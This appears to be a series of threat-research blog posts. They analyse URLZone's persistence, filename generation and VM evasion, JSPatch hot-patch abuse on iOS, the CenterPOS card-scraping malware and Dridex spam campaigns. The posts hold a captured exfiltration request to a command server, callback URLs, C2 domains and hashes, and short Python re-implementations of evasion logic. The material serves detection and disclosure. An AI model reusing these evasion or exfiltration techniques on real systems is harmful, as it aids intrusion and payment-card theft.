b.    Create a startup registry value under Software\Microsoft\Windows\CurrentVersion\Run using one of the following methods:

                        i.     Generate a shortcut (LNK file) pointing to %dropfilepath% and append “-autorun” to the generated LNK target.
                        ii.     If %dropfilepath% doesn’t exist, write a registry value with a “-autorun” parameter instead.

·       Generate a random 20-character string with the file extension .txt, concatenate it with the folder of %dropfilepath%, and call the result %txtfilepath%. Write a copy of the malware binary, taken from the running malware process’s heap or memory, to %txtfilepath%. Then call MoveFileExA with the MOVEFILE_DELAY_UNTIL_REBOOT flag to move the contents of %txtfilepath% to %dropfilepath%. This flag delays the file move until the system reboots, which is likely done to avoid arousing suspicion in security software. Figure 4 shows the corresponding MoveFileExA API call.

Figure 4. Delayed MoveFileExA API call to prevent antivirus detection

Random Filename Generation

URLZone uses an interesting algorithm to generate random filenames. Unlike most banking trojans, which generate random-looking strings for dropped filenames, URLZone builds the dropped file’s name from an array of strings. To add entropy to the generation algorithm, it uses a subroutine that creates a random byte using the RDTSC instruction combined with other arithmetic operations.

The array of strings used to generate the filename is as follows:

char *filenames[] = { "win", "video", "def", "mem", "dns", "user", "logon", "hlp", "mixer", "pack", "mon", "srv", "exec", "play" };

The random string generation algorithm can be invoked in two ways:

1.     rand(len_min, len_max, upper_offset_limit) -> to construct a random string from a given string.
2.     rand(upper_offset_limit) -> to get a random string from a given array.

len_min and len_max are the minimum and maximum lengths of the string to be returned. The upper_offset_limit is the upper limit of the offset, which is generated randomly.

The above algorithms are used to generate the filename as follows:

1.     Get a string randomly from the above array.
2.     Construct a random string of length between 1 and 2 from the string: "qwertyuiopasdfghjklzxcvbnm123945678"
3.     Randomly compute a flag and check its value. If the flag is 0, concatenate the strings generated in steps 1 and 2. If the flag is 1, randomly pick one more string from the array, as in step 1.

By putting all this together, we have the following two ways filenames can be generated based on the value of the random flag:

1.     If flag is 0, then concatenate strings in steps 1 and 2.
2.     If flag is 1, then concatenate strings in steps 1, 2, and 3.

The reason for generating the filenames this way may be to evade heuristics of security products, which alert on dropped executable files with randomly generated names. The filename generated using the above algorithm looks human readable and less suspicious.
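The scheme described above is simple to re-implement. The sketch below substitutes Python's PRNG for the malware's RDTSC-based byte generator but otherwise follows the reported steps:

```python
import random

WORDS = ["win", "video", "def", "mem", "dns", "user", "logon",
         "hlp", "mixer", "pack", "mon", "srv", "exec", "play"]
CHARSET = "qwertyuiopasdfghjklzxcvbnm123945678"

def generate_filename(rng=random):
    """Re-implement the described scheme; Python's PRNG stands in for
    the malware's RDTSC-based random byte generator."""
    name = rng.choice(WORDS)                       # step 1: random word
    name += "".join(rng.choice(CHARSET)            # step 2: 1-2 chars
                    for _ in range(rng.randint(1, 2)))
    if rng.randint(0, 1):                          # step 3: random flag
        name += rng.choice(WORDS)                  # flag=1: second word
    return name + ".exe"

print(generate_filename())  # e.g. a readable name like 'mem2play.exe'
```

As the blog notes, names built this way look human readable and evade heuristics tuned for random-looking dropped filenames.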

Evasion Technique

URLZone attempts to detect the use of VMware using the following method:

1.     Resolve SetupDi APIs by pre-calculated string hash from setupapi.dll
2.     Retrieve the device information using those APIs
3.     Check if the device names acquired contain the string “vm”

Figure 5. VMware sandbox detection

As shown in Figure 5, the malware assembles the two characters “vm” for comparison by partially collecting them from the string “Software\Microsoft\Windows\CurrentVersion\Run”. The SetupDi APIs enumerate the names of all devices installed in the system, such as “vmware” and “svga ii”.

As soon as one of the device names starts with the string “vm”, execution jumps to a hooking function and soon terminates the thread, preventing the malware from continuing its routine and CnC callback.
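The check itself reduces to a one-line predicate over the enumerated device names (the sample device names below are illustrative):

```python
def flags_vm(device_names):
    """Mimic the reported evasion check: flag the host as a VM if any
    enumerated device name starts with 'vm' (case-insensitive)."""
    return any(name.lower().startswith("vm") for name in device_names)

print(flags_vm(["VMware SVGA II", "Standard PS/2 Keyboard"]))  # True
print(flags_vm(["Intel(R) HD Graphics", "Realtek Audio"]))     # False
```

Sandboxes that rename or hide virtual device strings defeat this class of check.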

An Ongoing Campaign

On Jan. 19, 2016, and Jan. 20, 2016, we observed another round of URLZone spam targeting Japan. The basic TTPs are unchanged, but the scale is larger than the spam campaign we observed in December 2015.

Conclusion

Although URLZone has been around for a while and primarily targets countries in Europe, we still see it active and now shifting to Japan. It is likely that URLZone will further expand its activity in Japan with improved localization and techniques. Email users should be cautious about viewing emails coming from unknown senders.

Appendix

URLZone sample hashes

·       15896a44319d18f8486561b078146c30a0ce1cd7e6038f6d614324a39dfc6c28
·       884fccbbfa5a5b96d2e308856b996ee20d9656d04505fb3cdf926270f5d11c28

Hooked APIs

·       WinInet.HttpEndRequestA
·       WinInet.HttpEndRequestW
·       WinInet.HttpOpenRequestA
·       WinInet.HttpOpenRequestW
·       WinInet.HttpQueryInfoA
·       WinInet.HttpQueryInfoW
·       WinInet.HttpSendRequestA
·       WinInet.HttpSendRequestExW
·       WinInet.HttpSendRequestW
·       WinInet.InternetCloseHandle
·       WinInet.InternetQueryDataAvailable
·       WinInet.InternetReadFile
·       WinInet.InternetReadFileExA
·       WinInet.InternetReadFileExW
·       WinInet.InternetWriteFile
·       nspr.PR_Read
·       nspr.PR_Write
·       nspr.PR_Close
·       ws2_32.send
·       ws2_32.connect
·       ws2_32.closesocket

 

Hot or Not? The Benefits and Risks of iOS Remote Hot Patching


Introduction

Apple has made a significant effort to build and maintain a healthy and clean app ecosystem. The essential contributing component to this status quo is the App Store, which is protected by a thorough vetting process that scrutinizes all submitted applications. While the process is intended to protect iOS users and ensure apps meet Apple’s standards for security and integrity, developers who have experienced the process would agree that it can be difficult and time consuming. The same process then must be followed when publishing a new release or issuing a patched version of an existing app, which can be extremely frustrating when a developer wants to patch a severe bug or security vulnerability impacting existing app users.

The developer community has been searching for alternatives, and with some success. A set of solutions now offer a more efficient iOS app deployment experience, giving app developers the ability to update their code as they see fit and deploy patches to users’ devices immediately. While these technologies provide a more autonomous development experience, they do not meet the same security standards that Apple has attempted to maintain. Worse, these methods might be the Achilles heel to the walled garden of Apple’s App Store.

In this series of articles, FireEye mobile security researchers examine the security risks of iOS apps that employ these alternate solutions for hot patching, and seek to prevent unintended security compromises in the iOS app ecosystem.

As the first installment of this series, we look into an open source solution: JSPatch.

Episode 1. JSPatch

JSPatch is an open source project – built on top of Apple’s JavaScriptCore framework – with the goal of providing an alternative to Apple’s arduous and unpredictable review process in situations where the timely delivery of hot fixes for severe bugs is vital. In the author’s own words (bold added for emphasis):

JSPatch bridges Objective-C and JavaScript using the Objective-C runtime. You can call any Objective-C class and method in JavaScript by just including a small engine. That makes the APP obtaining the power of script language: add modules or replacing Objective-C code to fix bugs dynamically.

JSPatch Machinery

The JSPatch author, using the alias Bang, provided a common example of how JSPatch can be used to update a faulty iOS app on his blog:

Figure 1 shows an Objc implementation of a UITableViewController with class name JPTableViewController that provides data population via the selector tableView:didSelectRowAtIndexPath:. At line 5, it retrieves data from the backend source represented by an array of strings with an index mapping to the selected row number. In many cases, this functions fine; however, when the row index exceeds the range of the data source array, which can easily happen, the program will throw an exception and subsequently cause the app to crash. Crashing an app is never an appealing experience for users.

Figure 1. Buggy Objc code without JSPatch

Within the realm of Apple-provided technologies, the way to remediate this situation is to rebuild the application with updated code to fix the bug and submit the newly built app to the App Store for approval. While the review process for updated apps often takes less time than the initial submission review, the process can still be time-consuming, unpredictable, and can potentially cause loss of business if app fixes are not delivered in a timely and controlled manner.

However, if the original app is embedded with the JSPatch engine, its behavior can be changed according to the JavaScript code loaded at runtime. This JavaScript file (hxxp://cnbang.net/bugfix.JS in the above example) is remotely controlled by the app developer. It is delivered to the app through network communication.   

Figure 2 shows the standard way of setting up JSPatch in an iOS app. This code would allow download and execution of a JavaScript patch when the app starts:

Figure 2. Objc code enabling JSPatch in an app

JSPatch is indeed lightweight. In this case, the only additional work to enable it is to add seven lines of code to the application:didFinishLaunchingWithOptions: selector. Figure 3 shows the JavaScript downloaded from hxxp://cnbang.net/bugfix.JS that is used to patch the faulty code.

Figure 3. JSPatch hot patch fixing index out of bound bug in Figure 1
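For readers unfamiliar with runtime method replacement, the same idea can be mimicked in any reflective language. The Python sketch below is an analogy only (not JSPatch code): it reproduces the Figure 1 out-of-bounds bug and then "hot patches" the live class, the way Figure 3 patches the Objective-C selector through the runtime:

```python
class TableViewController:
    """Stand-in for the buggy JPTableViewController in Figure 1."""
    def __init__(self, data):
        self.data = data

    def did_select_row(self, index):
        return self.data[index]          # buggy: no bounds check

controller = TableViewController(["a", "b"])

# "Hot patch": replace the method on the live class without rebuilding
# the "app", just as JSPatch swaps Objective-C selector implementations.
def patched(self, index):
    if index >= len(self.data):
        return None                      # fixed: guard out-of-range rows
    return self.data[index]

TableViewController.did_select_row = patched
print(controller.did_select_row(5))      # None instead of a crash
```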

Malicious Capability Showcase

JSPatch is a boon to iOS developers. In the right hands, it can be used to quickly and effectively deploy patches and code updates. But in a non-utopian world like ours, we need to assume that bad actors will leverage this technology for unintended purposes. Specifically, if an attacker is able to tamper with the content of JavaScript file that is eventually loaded by the app, a range of attacks can be successfully performed against an App Store application.

Target App

We randomly picked a legitimate app[1] with JSPatch enabled from the App Store. The logistics of setting up the JSPatch platform and resources for code patching are packaged in this routine [AppDelegate excuteJSPatch:], as shown in Figure 4[2]:

Figure 4. JSPatch setup in the targeted app

There is a sequence of flow from the app entry point (in this case the AppDelegate class) to where the JavaScript file containing updates or patch code is written to the file system. This process involves communicating with the remote server to retrieve the patch code. On our test device, we eventually found that the JavaScript patch code is hashed and stored at the location shown in Figure 5. The corresponding content is shown in Figure 6 in Base64-encoded format:

Figure 5. Location of downloaded JavaScript on test device


Figure 6. Encrypted patch content

While the target app developer has taken steps to secure this sensitive data from prying eyes by employing Base64 encoding on top of a symmetric encryption, one can easily render this attempt futile by running a few commands through Cycript. The patch code, once decrypted, is shown in Figure 7:

Figure 7. Decrypted original patch content retrieved from remote server

This is the content that gets loaded and executed by JPEngine, the component provided by the JSPatch framework embedded in the target app. To change the behavior of the running app, one simply needs to modify the content of this JavaScript blob. Below we show several possibilities for performing malicious actions that are against Apple’s App Review Guidelines. Although the examples below are from a jailbroken device, we have demonstrated that they will work on non-jailbroken devices as well.

Example 1: Load arbitrary public frameworks into app process

a.     Example public framework: /System/Library/Frameworks/Accounts.framework
b.     Private APIs used by public framework: [ACAccountStore init], [ACAccountStore allAccountTypes]

The target app discussed above, when running, loads the frameworks shown in Figure 8 into its process memory:


Figure 8. iOS frameworks loaded by the target app

Note that the list above – generated from the Apple-approved iOS app binary – does not contain Accounts.framework. Therefore, any “dangerous” or “risky” operations that rely on the APIs provided by this framework are not expected to take place. However, the JavaScript code shown in Figure 9 invalidates that assumption.

Figure 9. JavaScript patch code that loads the Accounts.framework into the app process

If this JavaScript code were delivered to the target app as a hot patch, it could dynamically load a public framework, Accounts.framework, into the running process. Once the framework is loaded, the script has full access to all of the framework’s APIs. Figure 10 shows the outcome of executing the private API [ACAccountStore allAccountTypes], which outputs 36 account types on the test device. This added behavior does not require the app to be rebuilt, nor does it require another review through the App Store.  

Figure 10. The screenshot of the console log for utilizing Accounts.framework
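Conceptually, this is ordinary dynamic code loading: capabilities that never appear in the reviewed binary materialize at runtime. The Python sketch below is a language-neutral analogy (not iOS code); the module and function names are resolved from strings only when the "patch" runs:

```python
import importlib

def load_and_call(module_name, func_name, *args):
    """Load a module by name at runtime and invoke one of its functions.
    The static 'binary' references neither name, so a reviewer inspecting
    it would never see the capability."""
    module = importlib.import_module(module_name)
    return getattr(module, func_name)(*args)

# The source contains only strings; the behavior appears at runtime.
print(load_and_call("base64", "b64encode", b"hi"))  # b'aGk='
```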

The above demonstration highlights a serious security risk for iOS app users and app developers. The JSPatch technology potentially allows an individual to effectively circumvent the protection imposed by the App Store review process and perform arbitrary and powerful actions on the device without consent from the users. The dynamic nature of the code makes it extremely difficult to catch a malicious actor in action. We are not providing a working exploit in this blog post; we only point out the possibilities, to avoid handing low-skilled attackers an off-the-shelf exploit.

Example 2: Load arbitrary private frameworks into app process

a.     Example private framework: /System/Library/PrivateFrameworks/BluetoothManager.framework
b.     Private APIs used by example framework: [BluetoothManager connectedDevices], [BluetoothDevice name]

Similar to the previous example, a malicious JSPatch JavaScript could instruct an app to load an arbitrary private framework, such as the BluetoothManager.framework, and further invoke private APIs to change the state of the device. iOS private frameworks are intended to be used solely by Apple-provided apps. While there is no official public documentation regarding the usage of private frameworks, it is common knowledge that many of them provide private access to low-level system functionalities that may allow an app to circumvent security controls put in place by the OS. The App Store has a strict policy prohibiting third party apps from using any private frameworks. However, it is worth pointing out that the operating system does not differentiate Apple apps’ private framework usage and a third party app’s private framework usage. It is simply the App Store policy that bans third party use.

With JSPatch, this restriction has no effect because the JavaScript file is not subject to the App Store’s vetting. Figure 11 shows the code for loading the BluetoothManager.framework and utilizing APIs to read and change the states of Bluetooth of the host device. Figure 12 shows the corresponding console outputs.

Figure 11. JavaScript patch code that loads the BluetoothManager.framework into the app process

 

Figure 12. The screenshot of the console log for utilizing BluetoothManager.framework

Example 3: Change system properties via private API

a.     Example dependent framework: /System/Library/Frameworks/CoreTelephony.framework
b.    Private API used by example framework: [CTTelephonyNetworkInfo updateRadioAccessTechnology:]

Consider a target app that is built with the public framework CoreTelephony.framework. Apple documentation explains that this framework allows one to obtain information about a user’s home cellular service provider. It exposes several public APIs to developers to achieve this, but [CTTelephonyNetworkInfo updateRadioAccessTechnology:] is not one of them. However, as shown in Figure 13 and Figure 14, we can successfully use this private API to update the device cellular service status by changing the radio technology from CTRadioAccessTechnologyHSDPA to CTRadioAccessTechnologyLTE without Apple’s consent.

Figure 13. JavaScript code that changes the Radio Access Technology of the test device

 

Figure 14. Corresponding execution output of the above JavaScript code via Private API

Example 4: Access to Photo Album (sensitive data) via public APIs

a.     Example loaded framework: /System/Library/Frameworks/Photos.framework
b.     Public APIs: [PHAsset fetchAssetsWithMediaType:options:]

Privacy violations are a major concern for mobile users. Any actions performed on a device that involve accessing and using sensitive user data (including contacts, text messages, photos, videos, notes, call logs, and so on) should be justified within the context of the service provided by the app. However, Figure 15 and Figure 16 show how we can access the user’s photo album by leveraging public APIs from the built-in Photos.framework to harvest the metadata of photos. With a bit more code, one can export this image data to a remote location without the user’s knowledge.

Figure 15. JavaScript code that accesses the Photo Library

 

Figure 16. Corresponding output of the above JavaScript in Figure 15

Example 5: Access to Pasteboard in real time

a.     Example Framework: /System/Library/Frameworks/UIKit.framework
b.     APIs: [UIPasteboard strings], [UIPasteboard items], [UIPasteboard string]

iOS pasteboard is one of the mechanisms that allows a user to transfer data between apps. Some security researchers have raised concerns regarding its security, since pasteboard can be used to transfer sensitive data such as accounts and credentials. Figure 17 shows a simple demo function in JavaScript that, when running on the JSPatch framework, scrapes all the string contents off the pasteboard and displays them on the console. Figure 18 shows the output when this function is injected into the target application on a device.

Figure 17. JavaScript code that scrapes the pasteboard, which might contain sensitive information

 

Figure 18. Console output of the scraped content from pasteboard by code in Figure 17

We have shown five examples utilizing JSPatch as an attack vector, and the potential for more is only constrained by an attacker’s imagination and creativity.

Future Attacks

Much of iOS’ native capability relies on C functions (for example, dlopen() and UIGetScreenImage()). Because C functions cannot be reflectively invoked, JSPatch does not map them directly into JavaScript. In order to use C functions in JavaScript, an app must implement JSExtension, which wraps each C function in a corresponding interface that is then exported to JavaScript.

This dependency on additional Objective-C code to expose C functions places limits on a malicious actor’s ability to perform operations such as taking stealth screenshots, sending and intercepting text messages without consent, stealing photos from the gallery, or stealthily recording audio. But these limitations can easily be lifted should an app developer choose to add a bit more Objective-C code to wrap and expose these C functions. In fact, the JSPatch author could offer such support to app developers in the near future through more usable and convenient interfaces, granted there is enough demand. In that case, all of the above operations could become reality without Apple’s consent.

Security Impact

It is a general belief that iOS devices are more secure than mobile devices running other operating systems; however, one has to bear in mind that the elements contributing to this status quo are multi-faceted. The core of Apple’s security controls to provide and maintain a secure ecosystem for iOS users and developers is their walled garden – the App Store. Apps distributed through the App Store are significantly more difficult to leverage in meaningful attacks. To this day, two main attack vectors make up all previously disclosed attacks against the iOS platform:

1.     Jailbroken iOS devices that allow unsigned or ill-signed apps to be installed due to the disabled signature checking function. In some cases, the sandbox restrictions are lifted, which allows apps to function outside of the sandbox.

2.     App sideloading via Enterprise Certifications on non-jailbroken devices. FireEye published a series of reports that detailed attacks exploiting this attack surface, and recent reports show a continued focus on this known attack vector.

However, as we have highlighted in this report, JSPatch offers an attack vector that does not require sideloading or a jailbroken device for an attack to succeed. It is not difficult to identify that the JavaScript content, which is not subject to any review process, is a potential Achilles heel in this app development architecture. Since there are few to zero security measures to ensure the security properties of this file, the following scenarios for attacking the app and the user are conceivable:

●      Precondition: 1) App embeds JSPatch platform; 2) App Developer has malicious intentions.

○      Consequences: The app developer can utilize all the Private APIs provided by the loaded frameworks to perform actions that are not advertised to Apple or the users. Since the developer has control of the JavaScript code, the malicious behavior can be temporary, dynamic, stealthy, and evasive. Such an attack, when in place, will pose a big risk to all stakeholders involved.

○      Figure 19 demonstrates a scenario of this type of attack:

Figure 19. Threat model for JSPatch used by a malicious app developer

●      Precondition: 1) Third-party ad SDK embeds JSPatch platform; 2) Host app uses the ad SDK; 3) Ad SDK provider has malicious intention against the host app.

○      Consequences: 1) Ad SDK can exfiltrate data from the app sandbox; 2) Ad SDK can change the behavior of the host app; 3) Ad SDK can perform actions on behalf of the host app against the OS.

○      This attack scenario is shown in Figure 20:

Figure 20. Threat model for JSPatch used by a third-party library provider

The FireEye discovery of iBackdoor in 2015 is an alarming example of displaced trust within the iOS development community, and serves as a sneak peek into this type of overlooked threat.

●      Precondition: 1) App embeds JSPatch platform; 2) App Developer is legitimate; 3) App does not protect the communication from the client to the server for JavaScript content; 4) A malicious actor performs a man-in-the-middle (MITM) attack that tampers with the JavaScript content.

○      Consequences: MITM can exfiltrate app contents within the sandbox; MITM can perform actions through Private API by leveraging host app as a proxy.

○      This attack scenario is shown in Figure 21:

           Figure 21. Threat model for JSPatch used by an app targeted by MITM
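The third precondition in the MITM scenario (an unprotected patch channel) is the most straightforward for a legitimate developer to remove: refuse to execute any downloaded script that fails an integrity check. The sketch below illustrates one possible approach using HMAC-SHA256; the key handling and patch format here are our own illustrative assumptions, not part of JSPatch:

```python
import hashlib
import hmac

SHARED_KEY = b"replace-with-a-provisioned-secret"  # illustrative key only

def verify_patch(script: bytes, signature_hex: str) -> bool:
    """Accept a downloaded patch only if its HMAC-SHA256 tag matches;
    a MITM without the key cannot forge a valid tag."""
    expected = hmac.new(SHARED_KEY, script, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, signature_hex)

patch = b"defineClass('JPTableViewController', { /* fixed code */ })"
tag = hmac.new(SHARED_KEY, patch, hashlib.sha256).hexdigest()
print(verify_patch(patch, tag))                 # True
print(verify_patch(patch + b" tampered", tag))  # False
```

A symmetric key embedded in the app can still be extracted from the binary, so public-key signatures over TLS would be the stronger design; the point is only that some verification must gate execution.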

Field Survey

JSPatch originated in China. Since its release in 2015, it has seen wide adoption in the Chinese market. According to JSPatch, many popular and high profile Chinese apps have adopted this technology. FireEye app scanning found a total of 1,220 apps in the App Store that utilize JSPatch.

We also found that developers outside of China have adopted this framework. On one hand, this indicates that JSPatch is a useful and desirable technology in the iOS development world. On the other hand, it signals that users are at greater risk of being attacked – particularly if precautions are not taken to ensure the security of all parties involved. Despite the risks posed by JSPatch, FireEye has not identified any of the aforementioned applications as being malicious.  

Food For Thought

Many applaud Apple’s App Store for helping to keep iOS malware at bay. While it is undeniably true that the App Store plays a critical role in winning this acclaim, it is at the cost of app developers’ time and resources.

One manifestation of that cost is the app hot patching process, where even a simple bug fix has to go through an app review process that subjects developers to an average waiting time of seven days before updated code is approved. Thus, it is not surprising to see developers seeking solutions that bypass this wait period, but which lead to unintended security risks that may catch Apple off guard.

JSPatch is one of several different offerings that provide a low-cost and streamlined patching process for iOS developers. All of these offerings expose a similar attack vector that allows patching scripts to alter the app behavior at runtime, without the constraints imposed by the App Store’s vetting process. Our demonstration of abusing JSPatch capabilities for malicious gain, as well as our presentation of different attack scenarios, highlights an urgent problem and an imperative need for a better solution – notably due to a growing number of app developers in China and beyond having adopted JSPatch.

Many developers have doubts that the App Store would accept technologies leveraging scripts such as JavaScript. According to Apple’s App Store Review Guidelines, apps that download code in any way or form will be rejected. However, the JSPatch community argues it is in compliance with Apple’s iOS Developer Program Information, which makes an exception to scripts and code downloaded and run by Apple's built-in WebKit framework or JavascriptCore, provided that such scripts and code do not change the primary purpose of the application by providing features or functionality that are inconsistent with the intended and advertised purpose of the application as submitted to the App Store.

The use of malicious JavaScript (which presumably changes the primary purpose of the application) is clearly prohibited by App Store policy. JSPatch is walking a fine line, but it is not alone. In our coming reports, we intend to examine more of these offerings in search of an approach that satisfies both Apple and the developer community without jeopardizing users’ security. Stay tuned!

 

[1] We have contacted the app provider regarding the issue. In order to protect the app vendor and its users, we choose to not disclose the identity before they have this issue addressed.
[2] The redacted part is the hardcoded decryption key.

 

CenterPOS: An Evolving POS Threat


Introduction

There has been no shortage of point-of-sale (POS) threats in the past couple of years. This type of malicious software has gained widespread notoriety in recent years due to its use in high-profile breaches, some of which involved well-known brick-and-mortar retailers and led to the compromise of millions of payment cards. Our investigation into these threats led us to analyze a relatively new POS malware family known as CenterPOS.

CenterPOS

CenterPOS malware was initially discovered in September 2015 in a directory filled with other POS malware, including NewPoSThings, two Alina variants known as “Spark” and “Joker,” and BlackPOS. This CenterPOS sample (171c4c62ab2001c2f2394c3ec021dfa3) contains an internal version of “1.7” and is a memory scraper that iterates through running processes in order to extract payment card information. The payment card information is transferred to a command and control (CnC) server via HTTP POST:

    POST /2kj1h43.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=axlmcc3u.x5w
    Host: jackkk[.]com
    Content-Length: 159
    Expect: 100-continue
    Connection: Keep-Alive

    --axlmcc3u.x5w

    Content-Disposition: form-data; name="userfile";filename="1432.txt"
    Content-Type: application/octet-stream

    AAAAAAAAAAAA
    --axlmcc3u.x5w--
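Traffic matching this exfiltration pattern can be flagged with a simple heuristic. The following Python sketch is purely illustrative (it is not FireEye's detection logic); it keys on the combination of a short random .php resource, a multipart form upload, and a "userfile" field carrying a .txt filename, as seen in the request above:

```python
import re

# Illustrative detection heuristic for CenterPOS v1.7-style exfiltration:
# a multipart POST of a "userfile" form field with a .txt filename to a
# short .php resource. Not FireEye's actual detection logic.
EXFIL_RE = re.compile(
    r'POST\s+/\w+\.php\s+HTTP/1\.1.*?'            # short random .php resource
    r'Content-Type:\s*multipart/form-data.*?'      # multipart form upload
    r'name="userfile";\s*filename="[^"]+\.txt"',   # card data staged as .txt
    re.DOTALL | re.IGNORECASE,
)

def looks_like_centerpos_exfil(http_request: str) -> bool:
    """Return True if a raw HTTP request matches the exfiltration pattern."""
    return bool(EXFIL_RE.search(http_request))
```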

Table 1 shows several CenterPOS v1.7 variants and their associated CnC locations.

MD5                               CnC                                                        Version
171c4c62ab2001c2f2394c3ec021dfa3  jackkk[.]com (resolves to 138.204.168.109)                 1.7
7e6b2f107f6dbc1bc406f4359de4c5db  188.120.227.156                                            1.7
ef5e361a6b16d682e1506aba6164feee  188.120.227.156                                            1.7
c9d4ff350f26c11b934e19bb1ef7698d  rs000370.fastrootserver[.]de (resolves to 89.163.209.117)  1.7
0d142438f731652b746c9ad7fd1a9850  sobra[.]ws (resolves to 50.7.193.210)                      1.7

Table 1: CenterPOS v1.7 samples

We discovered a live CnC server (the admin panel is shown in Figure 1) that allowed us to confirm that CenterPOS is known as “Cerebrus” in the underground (not to be confused with the RAT known as Cerberus).

Figure 1: Cerebrus 1.7 (CenterPOS) Admin Panel Login

Further investigation revealed that there is a new version of CenterPOS, version 2.0, that is functionally very similar to version 1.7. The key difference is that version 2.0 uses a configuration file to store the CnC information. When executed, the malware checks for a configuration file that can be located in one of three locations:

  • Appended to the end of the file enclosed by the strings [dup] ... [/dup].
  • A file named mscorsv.nlp located in the same directory.
  • In the registry: HKLM\SYSTEM\CurrentControlSet\Control\Framework.NET
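For the first location, pulling the trailer off an infected binary is straightforward. In this minimal sketch, the [dup] ... [/dup] marker strings come from the malware; the parsing code itself is illustrative, not the malware's own parser:

```python
from typing import Optional

DUP_OPEN, DUP_CLOSE = b"[dup]", b"[/dup]"

def extract_appended_config(payload: bytes) -> Optional[bytes]:
    """Pull a CenterPOS-style configuration blob appended to the end of a
    file between [dup] ... [/dup] markers, the first of the three locations
    the malware checks. Returns None if no trailer is present."""
    start = payload.rfind(DUP_OPEN)
    end = payload.rfind(DUP_CLOSE)
    if start == -1 or end == -1 or end <= start:
        return None
    return payload[start + len(DUP_OPEN):end]
```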

If a configuration file is not present, the malware will open a dialog box that prompts for a password. If the correct password is entered, a dialog box will appear that allows an operator to enter CnC information, as well as a password used to encrypt the configuration file (see Figure 2).

Figure 2: Cerebrus 2.0 (CenterPOS) Configuration Builder

The malware contains two modes for scraping memory and looking for credit card information, a “smart scan” mode and a “normal scan” mode. The “normal scan” mode will act nearly the same as v1.7:

The malware iterates over all processes and begins searching process memory space if the process meets the following criteria:

  • The process is not the current running process.
  • The process name is not in the ignore list.
  • The process name is not “system,” “system idle process,” or “idle.”
  • The process file version info does not contain “microsoft,” “apple inc,” “adobe systems,” “intel corporation,” “vmware,” “mozilla,” or “host process for windows services.”
  • The process full path's SHA-256 hash is not in the SHA-256 blacklist.

If the process meets the criteria list, the malware will search all memory regions within the process searching for credit card data with regular expressions in the regular expression list.

In “smart scan” mode, the malware starts by performing a “normal scan.” Any process that has a regular expression match will be added to the “smart scan” list. After the first pass, the malware will only search the processes that are in the “smart scan” list.

After each iteration of scanning all process memory, the malware takes any data that matches and encrypts it using TripleDES with the key found in the configuration file.

The malware will send information about the system and the current settings to the CnC server after every other search. The gathered system information includes all system users, logged in users, sessions, process list, and current settings list. Each of these items will be sent in a separate HTTP POST request.

The malware primarily sends data to the CnC server, but can also receive commands. The malware can receive and process the following list of commands:

  • [restartnow] : Restarts the malware service.
  • [uninstallnow] : Uninstalls the malware.
  • [quitnow] : Terminates the current malware process.
  • <script> : <script> is a batch script to be run on the system.

In addition to processing commands, the malware also accepts commands to update its current settings. The following list shows the settings that can be changed:

  • [clientlogs] : Enable or disable logging.
  • [smartscan] : Enables or disables “smart scan.”
  • [bincountreset] : Total number of processes to scan before restarting a scan.
  • [blackmamba] : List of blacklisted values that could be matched on by the regular expressions.
  • [blackproc] : List of blacklisted process names.
  • [regexlist] : Updates the regular expression list for searching process memory.
  • [blacksha256] : Updates the blacklist of full path SHA-256 values for processes. Processes in this black list will be terminated.
  • [antihack] : Checks the Image File Execution Options settings for several executables and deletes the “Debugger” value if it exists. The executable list is: sethc.exe, osk.exe, utilman.exe, magnify.exe, and oks.exe.
  • [commonblackcards] : Use blackmamba blacklisted values.
  • [restartafter] : Restarts the service after a number of memory scan iterations.
  • [restart] : Restarts the malware service.
  • [uninstall] : Uninstalls the malware.

The operators control the compromised systems and harvest stolen payment card information through a web interface located on the CnC server, as shown in Figure 3.


Figure 3: Cerebrus 2.0 (CenterPOS) Admin Panel Login

Table 2 shows several CenterPOS v2.0 variants and their associated CnC locations.

MD5                               CnC                                                 Version
1acf2eed3c5a8a85a34e606dd897eaac  www.x00x[.]la (resolves to 193.189.117.58)          2.0
96b65da18a72987e1dd3be2a947412c5  193.111.139.142                                     2.0
a54b0812f003bb15891709ab7a125828  5m0k3[.]lol (resolves to 193.189.117.58)            2.0
1d7d70c0699db32817f910942e7a619a  www.amprofile.co[.]uk (resolves to 193.189.116.29)  2.0

Table 2: CenterPOS v2.0 samples

Conclusion

There is an increasing demand for POS malware in the underground as cybercriminals continue to target retailers in order to steal payment card information. CenterPOS, known in the underground as Cerebrus, is continuing to evolve. This version contains functionality that allows cybercriminals to create a configuration file. In contrast to the traditional builder-server model, the configuration file can be created from the payload itself, allowing the operators to easily update the CnC information if necessary.

Dridex Botnet Resumes Spam Operations After the Holidays


FireEye Labs observed that Dridex operators were active during the holiday season. However, during the post-Christmas and New Year weeks, we observed a slowdown in their spam campaigns.

Interestingly, their breaks were short. Over the past few weeks they have resumed operations and are building momentum. A small Dridex spike was seen in the first week of January 2016, followed by a few large waves of Dridex campaigns in the following weeks, as seen in Figure 1. FireEye Labs has studied this prolific spam botnet in the past, detailing some of its delivery mechanisms here and its takedown recovery here.

Figure 1. Malicious .doc and .xls attachment counts through January

These campaigns largely targeted the manufacturing, telecommunications, and financial services sectors, as seen in Figure 2.

Figure 2. Targeted industries

In addition, the campaigns mostly targeted the United States and United Kingdom, as seen in Figure 3.

Figure 3: Targeted countries

Here are quick summaries and indicators for some of the prominent campaigns.

British Gas account spam, week of January 11

Sample email:

Figure 4. British Gas themed spam message

Sending addresses:

·      khouse2@kochind.onmicrosoft.com
·      trinity<xxxx>@topsource.co.uk

Subject lines:

British Gas - A/c No. 602131633 - New Account

Attachment names:

British Gas.doc

Callback patterns:

GET /l9k7hg4/b4387kfd.exe HTTP/1.1

Callback IPs/domains:

·      amyzingbooks.com
·      powerstarthosting.com
·      webdesignoshawa.ca

 

Telephone bill themed spam, week of January 18

Sample email:

Figure 5. Telephone bill themed spam message


Sending addresses:

The Billing Team <noreply@callbilling.co.uk>

Subject lines:

Your Telephone Bill Invoices & Reports

Attachment names:

Invoice_316103_Jul_2013.doc

Callback patterns:

GET /8h75f56f/34qwj9kk.exe HTTP/1.1

Callback IPs/domains:

·      bolmgren.com
·      phaleshop.com
·      return-gaming.de

 

New Order spam, week of January 25

Sample email:

Figure 6. New Order-themed spam message

Sending addresses:

Michelle.Ludlow@dssmith.com

Subject lines:

New Order

Attachment names:

doc4502094035.doc

Callback patterns:

·      GET /4f4f/7u65j5hg.exe HTTP/1.1
·      GET /54t4f4f/7u65j5hg.exe HTTP/1.1

Callback IPs/domains:

·      elta-th.com
·      grudeal.com
·      trendcheckers.com
